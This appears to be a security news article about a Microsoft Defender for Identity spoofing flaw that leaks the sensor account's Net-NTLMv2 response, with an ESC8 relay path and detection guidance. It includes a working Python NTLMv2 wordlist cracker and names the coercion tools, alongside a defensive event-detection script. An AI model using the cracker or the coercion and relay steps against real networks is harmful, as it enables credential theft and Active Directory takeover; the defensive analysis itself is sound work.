Microsoft Defender Spoofing Vulnerability Enables Privilege Escalation and Active Directory Access

A spoofing vulnerability in Microsoft Defender for Identity (MDI) allows unauthenticated attackers on the local network to capture authentication material for the sensor's service account and potentially gain unauthorized access to Active Directory environments.

The vulnerability, tracked as CVE-2025-26685, abuses the Lateral Movement Paths feature to coerce the MDI sensor into authenticating to an attacker-controlled host, which reveals the Net-NTLM (NTLMv2 challenge-response) of the Directory Service Account (DSA) and creates a pathway for privilege escalation.

NetSPI's security research team identified the flaw in the Microsoft Defender for Identity sensor, which turns a feature intended to protect Active Directory into a way to attack it.

The vulnerability stems from the MDI sensor's implementation of the Lateral Movement Paths (LMPs) feature, which maps administrative privileges across systems to help organizations identify potential attack paths within their networks. To build that map, the sensor connects to endpoints and queries their local group membership, authenticating as the Directory Service Account.

The vulnerability allows attackers with local network access to abuse this behaviour without any initial credentials.

When specific conditions are met, an unauthenticated attacker can trigger the MDI sensor to authenticate to a system under their control, capturing the Directory Service Account's Net-NTLMv2 challenge-response.

A Net-NTLMv2 response is not a reusable password hash: it cannot be used for pass-the-hash, but it can be subjected to offline password cracking or relayed to another service to escalate privileges within the target environment. Cracking is only realistic if the DSA has a human-chosen password; a group Managed Service Account (gMSA), which Microsoft recommends for the DSA, has a long, randomly generated and automatically rotated password, which leaves relay as the practical path.

Microsoft Defender Spoofing Vulnerability

The attack requires two conditions. First, the attacker's system must have a DNS record in the domain, which commonly happens automatically when a Windows DHCP Server integrated with Active Directory registers client records dynamically. Second, the attacker must initiate an anonymous connection to a Domain Controller that generates a specific Windows Event ID, which the MDI sensor consumes.

During the attack, an attacker can use Impacket's smbserver.py to host the attacker-side SMB listener and a tool such as Samba's rpcclient to establish an SMB anonymous null session with the target Domain Controller.

This unauthenticated action triggers the MDI sensor to query the attacker's system for the members of its local Administrators group as part of LMP mapping.

The query runs over the SAM-R protocol (MS-SAMR, carried over SMB). Because the attacker controls the server end of that connection, the sensor's Kerberos authentication can be downgraded to NTLM, and the Directory Service Account's NTLMv2 challenge-response is handed to the attacker.
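What the attacker holds at this point is an NTLMv2 challenge-response, and whether it can be cracked depends entirely on the DSA's password. The following is an added example (not NetSPI's tooling or Microsoft's code) that recreates the NTLMv2 computation from MS-NLMP and runs a wordlist against a capture written in the user::domain:challenge:NTProofStr:blob text form that capture tools such as Impacket's smbserver.py record and hashcat (mode 5600) consumes. The account name svc_mdi, the CORP domain, the nonces, the blob contents, the wordlist and the gMSA-like password are all constructed for the example; the pure-Python MD4 is there only because many OpenSSL 3 builds no longer expose md4 through hashlib.

```python
"""Offline cracking of a captured Net-NTLMv2 response (added example; constructed data)."""
import hashlib
import hmac
import secrets
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_pure(data: bytes) -> bytes:
    """RFC 1320 MD4, used when hashlib lacks md4 (OpenSSL 3 without the legacy provider)."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                t = (-i) % 4  # each step updates a, then d, then c, then b
                val = s[t] + fn(s[(t + 1) % 4], s[(t + 2) % 4], s[(t + 3) % 4]) + x[k] + const
                s[t] = _lrot(val & MASK, shifts[i % 4])
        state = [(a + b) & MASK for a, b in zip(state, s)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password))."""
    data = password.encode("utf-16-le")
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:
        return _md4_pure(data)


def ntlmv2_proof(password, user, domain, server_challenge, blob) -> bytes:
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, UPPER(user) + domain), server_challenge + blob)."""
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def build_blob(client_challenge: bytes, filetime: int) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE ('blob'): version bytes, reserved, timestamp, client nonce, empty AV pairs."""
    return b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime) + client_challenge + b"\x00" * 12


def capture_line(user, domain, password, server_challenge, blob) -> str:
    """Render a capture the way smbserver.py logs it and hashcat -m 5600 reads it."""
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist):
    """Return the first wordlist entry that reproduces NTProofStr, or None."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal, proof, blob = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed lab values (hypothetical DSA name, domain, nonces and wordlist):
DSA_USER, DOMAIN = "svc_mdi", "CORP"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = build_blob(bytes.fromhex("8877665544332211"), 133_500_000_000_000_000)
WORDLIST = ["Password1", "Summer2024!", "Winter2024!", "P@ssw0rd"]
GMSA_LIKE_PASSWORD = secrets.token_hex(60)  # stand-in for a gMSA's long random password


def demo():
    """Crack a human-chosen DSA password, then show a gMSA-style password resists the same attempt."""
    weak = crack(capture_line(DSA_USER, DOMAIN, "Winter2024!", SERVER_CHALLENGE, BLOB), WORDLIST)
    gmsa = crack(capture_line(DSA_USER, DOMAIN, GMSA_LIKE_PASSWORD, SERVER_CHALLENGE, BLOB), WORDLIST)
    return weak, gmsa


if __name__ == "__main__":
    print(demo())
```

The user name and domain are part of the NTLMv2 key, which is why the capture format carries them and why a response captured for the DSA cannot be replayed against a different account. Against a gMSA the wordlist pass returns nothing, which is the practical reason the write-up's relay path matters more than cracking.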

The vulnerability becomes particularly dangerous when combined with other weaknesses, such as Active Directory Certificate Services (AD CS) misconfigurations like ESC8, where a certificate enrollment web endpoint accepts NTLM authentication that can be relayed. Attackers can relay the captured authentication to such an endpoint, obtain a certificate for the Directory Service Account, and use it to request Kerberos Ticket Granting Tickets and recover the account's NT hash, providing substantial access to Active Directory resources.

In the researchers' lab setup, the DNS record precondition was satisfied on the Domain Controller by using DNS Manager to create a new "Reverse Lookup Zone" for the subnet the attacker system is on.

Security Recommendations

Organizations can implement several detection mechanisms to identify potential exploitation attempts.

Microsoft has acknowledged the vulnerability through the Microsoft Security Response Center (MSRC), and organizations using Microsoft Defender for Identity should ensure their sensors are updated with the latest security patches.

Security teams should monitor for Directory Service Account authentication events originating from IP addresses that are not Domain Controllers (or other servers hosting an MDI sensor), since the DSA should only authenticate from hosts running the sensor.

Additional detection opportunities include monitoring LDAP requests that enumerate certificate templates (the reconnaissance step before an ESC8 abuse) and tracking certificate issuance through Windows Event ID 4887 on the certification authority.

Organizations should also watch for Kerberos TGT requests using certificate-based pre-authentication, indicated on Domain Controllers by Windows Event ID 4768 with pre-authentication type 16 (PA-PK-AS-REQ).

The Directory Service Account should be closely monitored through existing endpoint detection and response solutions for any anomalous activities that could indicate compromise.
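The three signals above (a DSA logon from a host that does not run the sensor, a certificate issued to the DSA, and a PKINIT TGT request for it) can be expressed as simple rules over Windows event data. The following is an added example, not MDI's own detection logic or anything from the NetSPI write-up, that runs those rules over a handful of constructed event records. The DSA name svc_mdi, the sensor host addresses, the user names and the IP addresses are hypothetical; the relayed 4624 would be logged by whichever server the relay targets (the AD CS web enrollment host in the ESC8 case), the 4887 by the CA, and the 4768 by a Domain Controller, so the records are assumed to have been collected centrally.

```python
"""Detection rules for the three post-exploitation signals above, run over constructed events."""
from collections import Counter

# Hypothetical environment values for this example:
DSA_ACCOUNTS = {"svc_mdi"}                  # Directory Service Account sAMAccountName(s), lower-case
SENSOR_HOSTS = {"10.0.0.10", "10.0.0.11"}   # DCs (and any other servers) running an MDI sensor
PA_PK_AS_REQ = "16"                         # 4768 PreAuthType 16 = certificate-based pre-auth (PKINIT)


def _is_dsa(account: str) -> bool:
    """Match 'svc_mdi', 'CORP\\svc_mdi', 'svc_mdi@corp.local' and the gMSA form 'svc_mdi$'."""
    name = account.replace("\\", "/").split("/")[-1].split("@")[0]
    return name.rstrip("$").lower() in DSA_ACCOUNTS


def detect(events):
    """Return (rule, severity, event_id, detail) tuples for events that match a rule."""
    alerts = []
    for ev in events:
        eid, d = ev["EventID"], ev["EventData"]
        if eid == 4624 and _is_dsa(d["TargetUserName"]) and d["IpAddress"] not in SENSOR_HOSTS:
            # The DSA should only ever log on from hosts that run the sensor.
            alerts.append(("dsa_logon_from_unexpected_host", "high", eid,
                           f"{d['TargetUserName']} via {d['AuthenticationPackageName']} from {d['IpAddress']}"))
        elif eid == 4768 and d["PreAuthType"] == PA_PK_AS_REQ:
            # Certificate-based TGT requests are normal for smart-card users, so only
            # the DSA is high severity; everything else is recorded for baselining.
            sev = "high" if _is_dsa(d["TargetUserName"]) else "info"
            alerts.append(("pkinit_tgt_request", sev, eid, f"{d['TargetUserName']} from {d['IpAddress']}"))
        elif eid == 4887 and _is_dsa(d["Requester"]):
            # The CA logs 4887 on issuance; the DSA has no business enrolling for a certificate.
            alerts.append(("certificate_issued_to_dsa", "high", eid,
                           f"{d['Requester']} template={d['CertificateTemplate']}"))
    return alerts


def summarize(alerts):
    """Count alerts per (rule, severity) pair."""
    return Counter((rule, sev) for rule, sev, _, _ in alerts)


# Constructed sample events, in the order an ESC8 relay of the DSA would produce them.
SAMPLE_EVENTS = [
    {"EventID": 4624, "EventData": {"TargetUserName": "svc_mdi", "IpAddress": "10.0.0.10",
                                    "AuthenticationPackageName": "Kerberos"}},   # sensor on a DC: benign
    {"EventID": 4624, "EventData": {"TargetUserName": "alice", "IpAddress": "10.0.0.55",
                                    "AuthenticationPackageName": "NTLM"}},       # ordinary user: benign
    {"EventID": 4624, "EventData": {"TargetUserName": "svc_mdi", "IpAddress": "10.0.0.55",
                                    "AuthenticationPackageName": "NTLM"}},       # relayed DSA logon
    {"EventID": 4768, "EventData": {"TargetUserName": "bob", "PreAuthType": "16",
                                    "IpAddress": "10.0.0.70"}},                  # smart-card user: info
    {"EventID": 4887, "EventData": {"Requester": "CORP\\alice", "CertificateTemplate": "User"}},
    {"EventID": 4887, "EventData": {"Requester": "CORP\\svc_mdi$", "CertificateTemplate": "User"}},
    {"EventID": 4768, "EventData": {"TargetUserName": "svc_mdi", "PreAuthType": "16",
                                    "IpAddress": "10.0.0.55"}},                  # PKINIT with the DSA cert
    {"EventID": 4768, "EventData": {"TargetUserName": "svc_mdi", "PreAuthType": "2",
                                    "IpAddress": "10.0.0.10"}},                  # normal sensor TGT: benign
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
    print(summarize(detect(SAMPLE_EVENTS)))
```

The sensor host allow-list is the part that needs care in a real deployment: it must include every server that runs an MDI sensor, otherwise legitimate DSA logons from those hosts become false positives, and the 4768 rule is scoped to the DSA precisely because pre-authentication type 16 is routine wherever smart cards or Windows Hello for Business are in use.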


Mayura Kathir is a cybersecurity reporter at GBHackers News, covering daily incidents including data breaches, malware attacks, cybercrime, vulnerabilities, zero-day exploits, and more.
